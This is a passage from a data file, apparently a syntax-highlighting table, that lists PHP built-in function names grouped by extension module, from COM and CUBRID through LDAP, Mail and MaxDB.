'com_isenum',
'com_load_typelib',
'com_load',
'com_message_pump',
'com_print_typeinfo',
'com_propget',
'com_propput',
'com_propset',
'com_release',
'com_set',
'variant_abs',
'variant_add',
'variant_and',
'variant_cast',
'variant_cat',
'variant_cmp',
'variant_date_from_timestamp',
'variant_date_to_timestamp',
'variant_div',
'variant_eqv',
'variant_fix',
'variant_get_type',
'variant_idiv',
'variant_imp',
'variant_int',
'variant_mod',
'variant_mul',
'variant_neg',
'variant_not',
'variant_or',
'variant_pow',
'variant_round',
'variant_set_type',
'variant_set',
'variant_sub',
'variant_xor'],
'CUBRID': ['cubrid_affected_rows',
'cubrid_bind',
'cubrid_close_prepare',
'cubrid_close_request',
'cubrid_col_get',
'cubrid_col_size',
'cubrid_column_names',
'cubrid_column_types',
'cubrid_commit',
'cubrid_connect_with_url',
'cubrid_connect',
'cubrid_current_oid',
'cubrid_disconnect',
'cubrid_drop',
'cubrid_error_code_facility',
'cubrid_error_code',
'cubrid_error_msg',
'cubrid_execute',
'cubrid_fetch',
'cubrid_free_result',
'cubrid_get_charset',
'cubrid_get_class_name',
'cubrid_get_client_info',
'cubrid_get_db_parameter',
'cubrid_get_server_info',
'cubrid_get',
'cubrid_insert_id',
'cubrid_is_instance',
'cubrid_lob_close',
'cubrid_lob_export',
'cubrid_lob_get',
'cubrid_lob_send',
'cubrid_lob_size',
'cubrid_lock_read',
'cubrid_lock_write',
'cubrid_move_cursor',
'cubrid_num_cols',
'cubrid_num_rows',
'cubrid_prepare',
'cubrid_put',
'cubrid_rollback',
'cubrid_schema',
'cubrid_seq_drop',
'cubrid_seq_insert',
'cubrid_seq_put',
'cubrid_set_add',
'cubrid_set_drop',
'cubrid_version'],
'Cairo': ['cairo_create',
'cairo_font_face_get_type',
'cairo_font_face_status',
'cairo_font_options_create',
'cairo_font_options_equal',
'cairo_font_options_get_antialias',
'cairo_font_options_get_hint_metrics',
'cairo_font_options_get_hint_style',
'cairo_font_options_get_subpixel_order',
'cairo_font_options_hash',
'cairo_font_options_merge',
'cairo_font_options_set_antialias',
'cairo_font_options_set_hint_metrics',
'cairo_font_options_set_hint_style',
'cairo_font_options_set_subpixel_order',
'cairo_font_options_status',
'cairo_format_stride_for_width',
'cairo_image_surface_create_for_data',
'cairo_image_surface_create_from_png',
'cairo_image_surface_create',
'cairo_image_surface_get_data',
'cairo_image_surface_get_format',
'cairo_image_surface_get_height',
'cairo_image_surface_get_stride',
'cairo_image_surface_get_width',
'cairo_matrix_create_scale',
'cairo_matrix_create_translate',
'cairo_matrix_invert',
'cairo_matrix_multiply',
'cairo_matrix_rotate',
'cairo_matrix_transform_distance',
'cairo_matrix_transform_point',
'cairo_matrix_translate',
'cairo_pattern_add_color_stop_rgb',
'cairo_pattern_add_color_stop_rgba',
'cairo_pattern_create_for_surface',
'cairo_pattern_create_linear',
'cairo_pattern_create_radial',
'cairo_pattern_create_rgb',
'cairo_pattern_create_rgba',
'cairo_pattern_get_color_stop_count',
'cairo_pattern_get_color_stop_rgba',
'cairo_pattern_get_extend',
'cairo_pattern_get_filter',
'cairo_pattern_get_linear_points',
'cairo_pattern_get_matrix',
'cairo_pattern_get_radial_circles',
'cairo_pattern_get_rgba',
'cairo_pattern_get_surface',
'cairo_pattern_get_type',
'cairo_pattern_set_extend',
'cairo_pattern_set_filter',
'cairo_pattern_set_matrix',
'cairo_pattern_status',
'cairo_pdf_surface_create',
'cairo_pdf_surface_set_size',
'cairo_ps_get_levels',
'cairo_ps_level_to_string',
'cairo_ps_surface_create',
'cairo_ps_surface_dsc_begin_page_setup',
'cairo_ps_surface_dsc_begin_setup',
'cairo_ps_surface_dsc_comment',
'cairo_ps_surface_get_eps',
'cairo_ps_surface_restrict_to_level',
'cairo_ps_surface_set_eps',
'cairo_ps_surface_set_size',
'cairo_scaled_font_create',
'cairo_scaled_font_extents',
'cairo_scaled_font_get_ctm',
'cairo_scaled_font_get_font_face',
'cairo_scaled_font_get_font_matrix',
'cairo_scaled_font_get_font_options',
'cairo_scaled_font_get_scale_matrix',
'cairo_scaled_font_get_type',
'cairo_scaled_font_glyph_extents',
'cairo_scaled_font_status',
'cairo_scaled_font_text_extents',
'cairo_surface_copy_page',
'cairo_surface_create_similar',
'cairo_surface_finish',
'cairo_surface_flush',
'cairo_surface_get_content',
'cairo_surface_get_device_offset',
'cairo_surface_get_font_options',
'cairo_surface_get_type',
'cairo_surface_mark_dirty_rectangle',
'cairo_surface_mark_dirty',
'cairo_surface_set_device_offset',
'cairo_surface_set_fallback_resolution',
'cairo_surface_show_page',
'cairo_surface_status',
'cairo_surface_write_to_png',
'cairo_svg_surface_create',
'cairo_svg_surface_restrict_to_version',
'cairo_svg_version_to_string'],
'Calendar': ['cal_days_in_month',
'cal_from_jd',
'cal_info',
'cal_to_jd',
'easter_date',
'easter_days',
'FrenchToJD',
'GregorianToJD',
'JDDayOfWeek',
'JDMonthName',
'JDToFrench',
'JDToGregorian',
'jdtojewish',
'JDToJulian',
'jdtounix',
'JewishToJD',
'JulianToJD',
'unixtojd'],
'Classes/Object': ['call_user_method_array',
'call_user_method',
'class_alias',
'class_exists',
'get_called_class',
'get_class_methods',
'get_class_vars',
'get_class',
'get_declared_classes',
'get_declared_interfaces',
'get_object_vars',
'get_parent_class',
'interface_exists',
'is_a',
'is_subclass_of',
'method_exists',
'property_exists'],
'Classkit': ['classkit_import',
'classkit_method_add',
'classkit_method_copy',
'classkit_method_redefine',
'classkit_method_remove',
'classkit_method_rename'],
'Crack': ['crack_check',
'crack_closedict',
'crack_getlastmessage',
'crack_opendict'],
'Ctype': ['ctype_alnum',
'ctype_alpha',
'ctype_cntrl',
'ctype_digit',
'ctype_graph',
'ctype_lower',
'ctype_print',
'ctype_punct'],
'Cyrus': ['cyrus_authenticate',
'cyrus_bind',
'cyrus_close',
'cyrus_connect',
'cyrus_query',
'cyrus_unbind'],
'DB++': ['dbplus_add',
'dbplus_aql',
'dbplus_chdir',
'dbplus_close',
'dbplus_curr',
'dbplus_errcode',
'dbplus_errno',
'dbplus_find',
'dbplus_first',
'dbplus_flush',
'dbplus_freealllocks',
'dbplus_freelock',
'dbplus_freerlocks',
'dbplus_getlock',
'dbplus_getunique',
'dbplus_info',
'dbplus_last',
'dbplus_lockrel',
'dbplus_next',
'dbplus_open',
'dbplus_prev',
'dbplus_rchperm',
'dbplus_rcreate',
'dbplus_rcrtexact',
'dbplus_rcrtlike',
'dbplus_resolve',
'dbplus_restorepos',
'dbplus_rkeys',
'dbplus_ropen',
'dbplus_rquery',
'dbplus_rrename',
'dbplus_rsecindex',
'dbplus_runlink',
'dbplus_rzap',
'dbplus_savepos',
'dbplus_setindex',
'dbplus_setindexbynumber',
'dbplus_sql',
'dbplus_tcl',
'dbplus_tremove',
'dbplus_undo',
'dbplus_undoprepare',
'dbplus_unlockrel',
'dbplus_unselect',
'dbplus_update',
'dbplus_xlockrel',
'dbplus_xunlockrel'],
'DBA': ['dba_close',
'dba_delete',
'dba_exists',
'dba_fetch',
'dba_firstkey',
'dba_handlers',
'dba_insert',
'dba_key_split',
'dba_list',
'dba_nextkey',
'dba_open',
'dba_optimize',
'dba_popen',
'dba_replace',
'dba_sync'],
'DOM': ['dom_import_simplexml'],
'DOM XML (PHP 4)': ['domxml_new_doc',
'domxml_open_file',
'domxml_open_mem',
'domxml_version',
'domxml_xmltree',
'domxml_xslt_stylesheet_doc',
'domxml_xslt_stylesheet_file',
'domxml_xslt_stylesheet',
'domxml_xslt_version',
'xpath_eval_expression',
'xpath_eval',
'xpath_new_context',
'xpath_register_ns_auto',
'xpath_register_ns',
'xptr_eval',
'xptr_new_context'],
'Date/Time': ['checkdate',
'date_add',
'date_create_from_format',
'date_create',
'date_date_set',
'date_default_timezone_get',
'date_default_timezone_set',
'date_diff',
'date_format',
'date_get_last_errors',
'date_interval_create_from_date_string',
'date_interval_format',
'date_isodate_set',
'date_modify',
'date_offset_get',
'date_parse_from_format',
'date_parse',
'date_sub',
'date_sun_info',
'date_sunrise',
'date_sunset',
'date_time_set',
'date_timestamp_get',
'date_timestamp_set',
'date_timezone_get',
'date_timezone_set',
'date',
'getdate',
'gettimeofday',
'gmdate',
'gmmktime',
'gmstrftime',
'idate',
'localtime',
'microtime',
'mktime',
'strftime',
'strptime',
'strtotime',
'time',
'timezone_abbreviations_list',
'timezone_identifiers_list',
'timezone_location_get',
'timezone_name_from_abbr',
'timezone_name_get',
'timezone_offset_get',
'timezone_open',
'timezone_transitions_get',
'timezone_version_get'],
'Direct IO': ['dio_close', 'dio_fcntl', 'dio_open'],
'Directory': ['chdir',
'chroot',
'closedir',
'getcwd',
'opendir',
'readdir',
'rewinddir',
'scandir'],
'Enchant': ['enchant_broker_describe',
'enchant_broker_dict_exists',
'enchant_broker_free_dict',
'enchant_broker_free',
'enchant_broker_get_error',
'enchant_broker_init',
'enchant_broker_list_dicts',
'enchant_broker_request_dict',
'enchant_broker_request_pwl_dict',
'enchant_broker_set_ordering',
'enchant_dict_add_to_personal',
'enchant_dict_add_to_session',
'enchant_dict_check',
'enchant_dict_describe',
'enchant_dict_get_error',
'enchant_dict_is_in_session',
'enchant_dict_quick_check',
'enchant_dict_store_replacement',
'enchant_dict_suggest'],
'Error Handling': ['debug_backtrace',
'debug_print_backtrace',
'error_get_last',
'error_log',
'error_reporting',
'restore_error_handler',
'restore_exception_handler',
'set_error_handler',
'set_exception_handler',
'trigger_error',
'user_error'],
'Exif': ['exif_imagetype',
'exif_read_data',
'exif_tagname',
'exif_thumbnail',
'read_exif_data'],
'Expect': ['expect_expectl'],
'FAM': ['fam_cancel_monitor',
'fam_close',
'fam_monitor_collection',
'fam_monitor_directory',
'fam_monitor_file',
'fam_next_event',
'fam_open',
'fam_pending',
'fam_resume_monitor',
'fam_suspend_monitor'],
'FDF': ['fdf_add_doc_javascript',
'fdf_add_template',
'fdf_close',
'fdf_create',
'fdf_enum_values',
'fdf_errno',
'fdf_error',
'fdf_get_ap',
'fdf_get_attachment',
'fdf_get_encoding',
'fdf_get_file',
'fdf_get_flags',
'fdf_get_opt',
'fdf_get_status',
'fdf_get_value',
'fdf_get_version',
'fdf_header',
'fdf_next_field_name',
'fdf_open_string',
'fdf_open',
'fdf_remove_item',
'fdf_save_string',
'fdf_save',
'fdf_set_ap',
'fdf_set_encoding',
'fdf_set_file',
'fdf_set_flags',
'fdf_set_javascript_action',
'fdf_set_on_import_javascript',
'fdf_set_opt',
'fdf_set_status',
'fdf_set_submit_form_action',
'fdf_set_target_frame',
'fdf_set_value',
'fdf_set_version'],
'FTP': ['ftp_alloc',
'ftp_cdup',
'ftp_chdir',
'ftp_chmod',
'ftp_close',
'ftp_connect',
'ftp_delete',
'ftp_exec',
'ftp_fget',
'ftp_fput',
'ftp_get_option',
'ftp_get',
'ftp_login',
'ftp_mdtm',
'ftp_mkdir',
'ftp_nb_continue',
'ftp_nb_fget',
'ftp_nb_fput',
'ftp_nb_get',
'ftp_nb_put',
'ftp_nlist',
'ftp_pasv',
'ftp_put',
'ftp_pwd',
'ftp_quit',
'ftp_raw',
'ftp_rawlist',
'ftp_rename',
'ftp_rmdir',
'ftp_set_option',
'ftp_site',
'ftp_size',
'ftp_ssl_connect',
'ftp_systype'],
'Fileinfo': ['finfo_buffer',
'finfo_close',
'finfo_file',
'finfo_open',
'finfo_set_flags',
'mime_content_type'],
'Filesystem': ['basename',
'chgrp',
'chmod',
'chown',
'clearstatcache',
'copy',
'dirname',
'disk_free_space',
'disk_total_space',
'diskfreespace',
'fclose',
'feof',
'fflush',
'fgetc',
'fgetcsv',
'fgets',
'fgetss',
'file_exists',
'file_get_contents',
'file_put_contents',
'file',
'fileatime',
'filectime',
'filegroup',
'fileinode',
'filemtime',
'fileowner',
'fileperms',
'filesize',
'filetype',
'flock',
'fnmatch',
'fopen',
'fpassthru',
'fputcsv',
'fputs',
'fread',
'fscanf',
'fseek',
'fstat',
'ftell',
'ftruncate',
'fwrite',
'glob',
'is_dir',
'is_executable',
'is_file',
'is_link',
'is_readable',
'is_uploaded_file',
'is_writable',
'is_writeable',
'lchgrp',
'lchown',
'link',
'linkinfo',
'lstat',
'mkdir',
'move_uploaded_file',
'parse_ini_file',
'parse_ini_string',
'pathinfo',
'pclose',
'popen',
'readfile',
'readlink',
'realpath_cache_get',
'realpath_cache_size',
'realpath',
'rename',
'rewind',
'rmdir',
'set_file_buffer',
'stat',
'symlink',
'tempnam',
'tmpfile',
'touch',
'umask',
'unlink'],
'Filter': ['filter_has_var',
'filter_id',
'filter_input_array',
'filter_input',
'filter_list',
'filter_var_array',
'filter_var'],
'Firebird/InterBase': ['ibase_add_user',
'ibase_affected_rows',
'ibase_backup',
'ibase_blob_add',
'ibase_blob_cancel',
'ibase_blob_close',
'ibase_blob_create',
'ibase_blob_echo',
'ibase_blob_get',
'ibase_blob_import',
'ibase_blob_info',
'ibase_blob_open',
'ibase_close',
'ibase_commit_ret',
'ibase_commit',
'ibase_connect',
'ibase_db_info',
'ibase_delete_user',
'ibase_drop_db',
'ibase_errcode',
'ibase_errmsg',
'ibase_execute',
'ibase_fetch_assoc',
'ibase_fetch_object',
'ibase_fetch_row',
'ibase_field_info',
'ibase_free_event_handler',
'ibase_free_query',
'ibase_free_result',
'ibase_gen_id',
'ibase_maintain_db',
'ibase_modify_user',
'ibase_name_result',
'ibase_num_fields',
'ibase_num_params',
'ibase_param_info',
'ibase_pconnect',
'ibase_prepare',
'ibase_query',
'ibase_restore',
'ibase_rollback_ret',
'ibase_rollback',
'ibase_server_info',
'ibase_service_attach',
'ibase_service_detach',
'ibase_set_event_handler',
'ibase_timefmt',
'ibase_trans',
'ibase_wait_event'],
'FriBiDi': ['fribidi_log2vis'],
'FrontBase': ['fbsql_affected_rows',
'fbsql_autocommit',
'fbsql_blob_size',
'fbsql_change_user',
'fbsql_clob_size',
'fbsql_close',
'fbsql_commit',
'fbsql_connect',
'fbsql_create_blob',
'fbsql_create_clob',
'fbsql_create_db',
'fbsql_data_seek',
'fbsql_database_password',
'fbsql_database',
'fbsql_db_query',
'fbsql_db_status',
'fbsql_drop_db',
'fbsql_errno',
'fbsql_error',
'fbsql_fetch_array',
'fbsql_fetch_assoc',
'fbsql_fetch_field',
'fbsql_fetch_lengths',
'fbsql_fetch_object',
'fbsql_fetch_row',
'fbsql_field_flags',
'fbsql_field_len',
'fbsql_field_name',
'fbsql_field_seek',
'fbsql_field_table',
'fbsql_field_type',
'fbsql_free_result',
'fbsql_get_autostart_info',
'fbsql_hostname',
'fbsql_insert_id',
'fbsql_list_dbs',
'fbsql_list_fields',
'fbsql_list_tables',
'fbsql_next_result',
'fbsql_num_fields',
'fbsql_num_rows',
'fbsql_password',
'fbsql_pconnect',
'fbsql_query',
'fbsql_read_blob',
'fbsql_read_clob',
'fbsql_result',
'fbsql_rollback',
'fbsql_rows_fetched',
'fbsql_select_db',
'fbsql_set_characterset',
'fbsql_set_lob_mode',
'fbsql_set_password',
'fbsql_set_transaction',
'fbsql_start_db',
'fbsql_stop_db',
'fbsql_table_name',
'fbsql_tablename',
'fbsql_username',
'fbsql_warnings'],
'Function handling': ['call_user_func_array',
'call_user_func',
'create_function',
'forward_static_call_array',
'forward_static_call',
'func_get_arg',
'func_get_args',
'func_num_args',
'function_exists',
'get_defined_functions',
'register_shutdown_function',
'register_tick_function',
'unregister_tick_function'],
'GD and Image': ['gd_info',
'getimagesize',
'image_type_to_extension',
'image_type_to_mime_type'],
'GMP': ['gmp_abs',
'gmp_add',
'gmp_and',
'gmp_clrbit',
'gmp_cmp',
'gmp_com',
'gmp_div_q',
'gmp_div_qr',
'gmp_div_r',
'gmp_div',
'gmp_divexact',
'gmp_fact',
'gmp_gcd',
'gmp_gcdext',
'gmp_hamdist',
'gmp_init',
'gmp_intval',
'gmp_invert',
'gmp_jacobi',
'gmp_legendre',
'gmp_mod',
'gmp_mul',
'gmp_neg',
'gmp_nextprime',
'gmp_or',
'gmp_perfect_square',
'gmp_popcount',
'gmp_pow',
'gmp_powm',
'gmp_prob_prime',
'gmp_random',
'gmp_scan0',
'gmp_scan1',
'gmp_setbit',
'gmp_sign',
'gmp_sqrt',
'gmp_sqrtrem',
'gmp_strval',
'gmp_sub',
'gmp_testbit',
'gmp_xor'],
'GeoIP': ['geoip_continent_code_by_name',
'geoip_country_code_by_name',
'geoip_country_code3_by_name',
'geoip_country_name_by_name',
'geoip_database_info',
'geoip_db_avail',
'geoip_db_filename',
'geoip_db_get_all_info',
'geoip_id_by_name',
'geoip_isp_by_name',
'geoip_org_by_name',
'geoip_record_by_name',
'geoip_region_by_name',
'geoip_region_name_by_code',
'geoip_time_zone_by_country_and_region'],
'Gettext': ['bind_textdomain_codeset',
'bindtextdomain',
'dcgettext',
'dcngettext',
'dgettext',
'dngettext',
'gettext',
'ngettext',
'textdomain'],
'GnuPG': ['gnupg_adddecryptkey',
'gnupg_addencryptkey',
'gnupg_addsignkey',
'gnupg_cleardecryptkeys',
'gnupg_clearencryptkeys',
'gnupg_clearsignkeys',
'gnupg_decrypt',
'gnupg_decryptverify',
'gnupg_encrypt',
'gnupg_encryptsign',
'gnupg_export',
'gnupg_geterror',
'gnupg_getprotocol',
'gnupg_import',
'gnupg_init',
'gnupg_keyinfo',
'gnupg_setarmor',
'gnupg_seterrormode',
'gnupg_setsignmode',
'gnupg_sign',
'gnupg_verify'],
'Gopher': ['gopher_parsedir'],
'Grapheme': ['grapheme_extract',
'grapheme_stripos',
'grapheme_stristr',
'grapheme_strlen',
'grapheme_strpos',
'grapheme_strripos',
'grapheme_strrpos',
'grapheme_strstr',
'grapheme_substr'],
'Gupnp': ['gupnp_context_get_host_ip',
'gupnp_context_get_port',
'gupnp_context_get_subscription_timeout',
'gupnp_context_host_path',
'gupnp_context_new',
'gupnp_context_set_subscription_timeout',
'gupnp_context_timeout_add',
'gupnp_context_unhost_path',
'gupnp_control_point_browse_start',
'gupnp_control_point_browse_stop',
'gupnp_control_point_callback_set',
'gupnp_control_point_new',
'gupnp_device_action_callback_set',
'gupnp_device_info_get_service',
'gupnp_device_info_get',
'gupnp_root_device_get_available',
'gupnp_root_device_get_relative_location',
'gupnp_root_device_new',
'gupnp_root_device_set_available',
'gupnp_root_device_start',
'gupnp_root_device_stop',
'gupnp_service_action_get',
'gupnp_service_action_return_error',
'gupnp_service_action_return',
'gupnp_service_action_set',
'gupnp_service_freeze_notify',
'gupnp_service_info_get_introspection',
'gupnp_service_info_get',
'gupnp_service_introspection_get_state_variable',
'gupnp_service_notify',
'gupnp_service_proxy_action_get',
'gupnp_service_proxy_action_set',
'gupnp_service_proxy_add_notify',
'gupnp_service_proxy_callback_set',
'gupnp_service_proxy_get_subscribed',
'gupnp_service_proxy_remove_notify',
'gupnp_service_proxy_set_subscribed',
'gupnp_service_thaw_notify'],
'HTTP': ['http_cache_etag',
'http_cache_last_modified',
'http_chunked_decode',
'http_deflate',
'http_inflate',
'http_build_cookie',
'http_date',
'http_get_request_body_stream',
'http_get_request_body',
'http_get_request_headers',
'http_match_etag',
'http_match_modified',
'http_match_request_header',
'http_support',
'http_negotiate_charset',
'http_negotiate_content_type',
'http_negotiate_language',
'ob_deflatehandler',
'ob_etaghandler',
'ob_inflatehandler',
'http_parse_cookie',
'http_parse_headers',
'http_parse_message',
'http_parse_params',
'http_persistent_handles_clean',
'http_persistent_handles_count',
'http_persistent_handles_ident',
'http_get',
'http_head',
'http_post_data',
'http_post_fields',
'http_put_data',
'http_put_file',
'http_put_stream',
'http_request_body_encode',
'http_request_method_exists',
'http_request_method_name',
'http_request_method_register',
'http_request_method_unregister',
'http_request',
'http_redirect',
'http_send_content_disposition',
'http_send_content_type',
'http_send_data',
'http_send_file',
'http_send_last_modified',
'http_send_status',
'http_send_stream',
'http_throttle',
'http_build_str',
'http_build_url'],
'Hash': ['hash_algos',
'hash_copy',
'hash_file',
'hash_final',
'hash_hmac_file',
'hash_hmac',
'hash_init',
'hash_update_file',
'hash_update_stream',
'hash_update',
'hash'],
'Hyperwave': ['hw_Array2Objrec',
'hw_changeobject',
'hw_Children',
'hw_ChildrenObj',
'hw_Close',
'hw_Connect',
'hw_connection_info',
'hw_cp',
'hw_Deleteobject',
'hw_DocByAnchor',
'hw_DocByAnchorObj',
'hw_Document_Attributes',
'hw_Document_BodyTag',
'hw_Document_Content',
'hw_Document_SetContent',
'hw_Document_Size',
'hw_dummy',
'hw_EditText',
'hw_Error',
'hw_ErrorMsg',
'hw_Free_Document',
'hw_GetAnchors',
'hw_GetAnchorsObj',
'hw_GetAndLock',
'hw_GetChildColl',
'hw_GetChildCollObj',
'hw_GetChildDocColl',
'hw_GetChildDocCollObj',
'hw_GetObject',
'hw_GetObjectByQuery',
'hw_GetObjectByQueryColl',
'hw_GetObjectByQueryCollObj',
'hw_GetObjectByQueryObj',
'hw_GetParents',
'hw_GetParentsObj',
'hw_getrellink',
'hw_GetRemote',
'hw_getremotechildren',
'hw_GetSrcByDestObj',
'hw_GetText',
'hw_getusername',
'hw_Identify',
'hw_InCollections',
'hw_Info',
'hw_InsColl',
'hw_InsDoc',
'hw_insertanchors',
'hw_InsertDocument',
'hw_InsertObject',
'hw_mapid',
'hw_Modifyobject',
'hw_mv',
'hw_New_Document',
'hw_objrec2array',
'hw_Output_Document',
'hw_pConnect',
'hw_PipeDocument',
'hw_Root',
'hw_setlinkroot',
'hw_stat',
'hw_Unlock',
'hw_Who'],
'Hyperwave API': ['hw_api_attribute',
'hwapi_hgcsp',
'hw_api_content',
'hw_api_object'],
'IBM DB2': ['db2_autocommit',
'db2_bind_param',
'db2_client_info',
'db2_close',
'db2_column_privileges',
'db2_columns',
'db2_commit',
'db2_conn_error',
'db2_conn_errormsg',
'db2_connect',
'db2_cursor_type',
'db2_escape_string',
'db2_exec',
'db2_execute',
'db2_fetch_array',
'db2_fetch_assoc',
'db2_fetch_both',
'db2_fetch_object',
'db2_fetch_row',
'db2_field_display_size',
'db2_field_name',
'db2_field_num',
'db2_field_precision',
'db2_field_scale',
'db2_field_type',
'db2_field_width',
'db2_foreign_keys',
'db2_free_result',
'db2_free_stmt',
'db2_get_option',
'db2_last_insert_id'],
'ID3': ['id3_get_frame_long_name',
'id3_get_frame_short_name',
'id3_get_genre_id',
'id3_get_genre_list',
'id3_get_genre_name',
'id3_get_tag',
'id3_get_version',
'id3_remove_tag',
'id3_set_tag'],
'IDN': ['idn_to_ascii', 'idn_to_unicode', 'idn_to_utf8'],
'IIS': ['iis_add_server',
'iis_get_dir_security',
'iis_get_script_map',
'iis_get_server_by_comment',
'iis_get_server_by_path',
'iis_get_server_rights',
'iis_get_service_state',
'iis_remove_server',
'iis_set_app_settings',
'iis_set_dir_security',
'iis_set_script_map',
'iis_set_server_rights',
'iis_start_server',
'iis_start_service',
'iis_stop_server',
'iis_stop_service'],
'IMAP': ['imap_8bit',
'imap_alerts',
'imap_append',
'imap_base64',
'imap_binary',
'imap_body',
'imap_bodystruct',
'imap_check',
'imap_clearflag_full',
'imap_close',
'imap_createmailbox',
'imap_delete',
'imap_deletemailbox',
'imap_errors',
'imap_expunge',
'imap_fetch_overview',
'imap_fetchbody',
'imap_fetchheader',
'imap_fetchmime',
'imap_fetchstructure',
'imap_gc',
'imap_get_quota',
'imap_get_quotaroot',
'imap_getacl',
'imap_getmailboxes',
'imap_getsubscribed',
'imap_header',
'imap_headerinfo',
'imap_headers',
'imap_last_error',
'imap_list',
'imap_listmailbox',
'imap_listscan',
'imap_listsubscribed',
'imap_lsub',
'imap_mail_compose',
'imap_mail_copy',
'imap_mail_move',
'imap_mail',
'imap_mailboxmsginfo',
'imap_mime_header_decode',
'imap_msgno',
'imap_num_msg',
'imap_num_recent',
'imap_open',
'imap_ping',
'imap_qprint',
'imap_renamemailbox',
'imap_reopen',
'imap_rfc822_parse_adrlist',
'imap_rfc822_parse_headers',
'imap_rfc822_write_address',
'imap_savebody',
'imap_scanmailbox',
'imap_search',
'imap_set_quota',
'imap_setacl',
'imap_setflag_full',
'imap_sort',
'imap_status',
'imap_subscribe',
'imap_thread',
'imap_timeout',
'imap_uid',
'imap_undelete',
'imap_unsubscribe',
'imap_utf7_decode',
'imap_utf7_encode',
'imap_utf8'],
'Informix': ['ifx_affected_rows',
'ifx_blobinfile_mode',
'ifx_byteasvarchar',
'ifx_close',
'ifx_connect',
'ifx_copy_blob',
'ifx_create_blob',
'ifx_create_char',
'ifx_do',
'ifx_error',
'ifx_errormsg',
'ifx_fetch_row',
'ifx_fieldproperties',
'ifx_fieldtypes',
'ifx_free_blob',
'ifx_free_char',
'ifx_free_result',
'ifx_get_blob',
'ifx_get_char',
'ifx_getsqlca',
'ifx_htmltbl_result',
'ifx_nullformat',
'ifx_num_fields',
'ifx_num_rows',
'ifx_pconnect',
'ifx_prepare',
'ifx_query',
'ifx_textasvarchar',
'ifx_update_blob',
'ifx_update_char',
'ifxus_close_slob',
'ifxus_create_slob',
'ifxus_free_slob',
'ifxus_open_slob',
'ifxus_read_slob',
'ifxus_seek_slob',
'ifxus_tell_slob',
'ifxus_write_slob'],
'Ingres': ['ingres_autocommit_state',
'ingres_autocommit',
'ingres_charset',
'ingres_close',
'ingres_commit',
'ingres_connect',
'ingres_cursor',
'ingres_errno',
'ingres_error',
'ingres_errsqlstate',
'ingres_escape_string',
'ingres_execute',
'ingres_fetch_array',
'ingres_fetch_assoc',
'ingres_fetch_object',
'ingres_fetch_proc_return',
'ingres_fetch_row',
'ingres_field_length',
'ingres_field_name',
'ingres_field_nullable',
'ingres_field_precision',
'ingres_field_scale',
'ingres_field_type',
'ingres_free_result',
'ingres_next_error',
'ingres_num_fields',
'ingres_num_rows',
'ingres_pconnect',
'ingres_prepare',
'ingres_query',
'ingres_result_seek',
'ingres_rollback',
'ingres_set_environment',
'ingres_unbuffered_query'],
'Inotify': ['inotify_add_watch',
'inotify_init',
'inotify_queue_len',
'inotify_read',
'inotify_rm_watch'],
'JSON': ['json_decode', 'json_encode', 'json_last_error'],
'Java': ['java_last_exception_clear', 'java_last_exception_get'],
'Judy': ['judy_type', 'judy_version'],
'KADM5': ['kadm5_chpass_principal',
'kadm5_create_principal',
'kadm5_delete_principal',
'kadm5_destroy',
'kadm5_flush',
'kadm5_get_policies',
'kadm5_get_principal',
'kadm5_get_principals',
'kadm5_init_with_password',
'kadm5_modify_principal'],
'LDAP': ['ldap_8859_to_t61',
'ldap_add',
'ldap_bind',
'ldap_close',
'ldap_compare',
'ldap_connect',
'ldap_count_entries',
'ldap_delete',
'ldap_dn2ufn',
'ldap_err2str',
'ldap_errno',
'ldap_error',
'ldap_explode_dn',
'ldap_first_attribute',
'ldap_first_entry',
'ldap_first_reference',
'ldap_free_result',
'ldap_get_attributes',
'ldap_get_dn',
'ldap_get_entries',
'ldap_get_option',
'ldap_get_values_len',
'ldap_get_values',
'ldap_list',
'ldap_mod_add',
'ldap_mod_del',
'ldap_mod_replace',
'ldap_modify',
'ldap_next_attribute',
'ldap_next_entry',
'ldap_next_reference',
'ldap_parse_reference',
'ldap_parse_result',
'ldap_read',
'ldap_rename',
'ldap_sasl_bind',
'ldap_search',
'ldap_set_option',
'ldap_set_rebind_proc',
'ldap_sort',
'ldap_start_tls',
'ldap_t61_to_8859',
'ldap_unbind'],
'LZF': ['lzf_compress', 'lzf_decompress', 'lzf_optimized_for'],
'Libevent': ['event_add',
'event_base_free',
'event_base_loop',
'event_base_loopbreak',
'event_base_loopexit',
'event_base_new',
'event_base_priority_init',
'event_base_set',
'event_buffer_base_set',
'event_buffer_disable',
'event_buffer_enable',
'event_buffer_fd_set',
'event_buffer_free',
'event_buffer_new',
'event_buffer_priority_set',
'event_buffer_read',
'event_buffer_set_callback',
'event_buffer_timeout_set',
'event_buffer_watermark_set',
'event_buffer_write',
'event_del',
'event_free',
'event_new',
'event_set'],
'Lotus Notes': ['notes_body',
'notes_copy_db',
'notes_create_db',
'notes_create_note',
'notes_drop_db',
'notes_find_note',
'notes_header_info',
'notes_list_msgs',
'notes_mark_read',
'notes_mark_unread',
'notes_nav_create',
'notes_search',
'notes_unread',
'notes_version'],
'MCVE': ['m_checkstatus',
'm_completeauthorizations',
'm_connect',
'm_connectionerror',
'm_deletetrans',
'm_destroyconn',
'm_destroyengine',
'm_getcell',
'm_getcellbynum',
'm_getcommadelimited',
'm_getheader',
'm_initconn',
'm_initengine',
'm_iscommadelimited',
'm_maxconntimeout',
'm_monitor',
'm_numcolumns',
'm_numrows',
'm_parsecommadelimited',
'm_responsekeys'],
'Mail': ['ezmlm_hash', 'mail'],
'Mailparse': ['mailparse_determine_best_xfer_encoding',
'mailparse_msg_create',
'mailparse_msg_extract_part_file',
'mailparse_msg_extract_part',
'mailparse_msg_extract_whole_part_file',
'mailparse_msg_free',
'mailparse_msg_get_part_data',
'mailparse_msg_get_part',
'mailparse_msg_get_structure',
'mailparse_msg_parse_file',
'mailparse_msg_parse',
'mailparse_rfc822_parse_addresses',
'mailparse_stream_encode',
'mailparse_uudecode_all'],
'Math': ['abs',
'acos',
'acosh',
'asin',
'asinh',
'atan2',
'atan',
'atanh',
'base_convert',
'bindec',
'ceil',
'cos',
'cosh',
'decbin',
'dechex',
'decoct',
'deg2rad',
'exp',
'expm1'],
'MaxDB': ['maxdb_affected_rows',
'maxdb_autocommit',
'maxdb_bind_param',
'maxdb_bind_result',
'maxdb_change_user',
'maxdb_character_set_name',
'maxdb_client_encoding',
'maxdb_close_long_data',
'maxdb_close',
'maxdb_commit',
'maxdb_connect_errno',
'maxdb_connect_error',
'maxdb_connect',
'maxdb_data_seek',
'maxdb_debug',
'maxdb_disable_reads_from_master',
'maxdb_disable_rpl_parse',
'maxdb_dump_debug_info',
'maxdb_embedded_connect',
'maxdb_enable_reads_from_master',
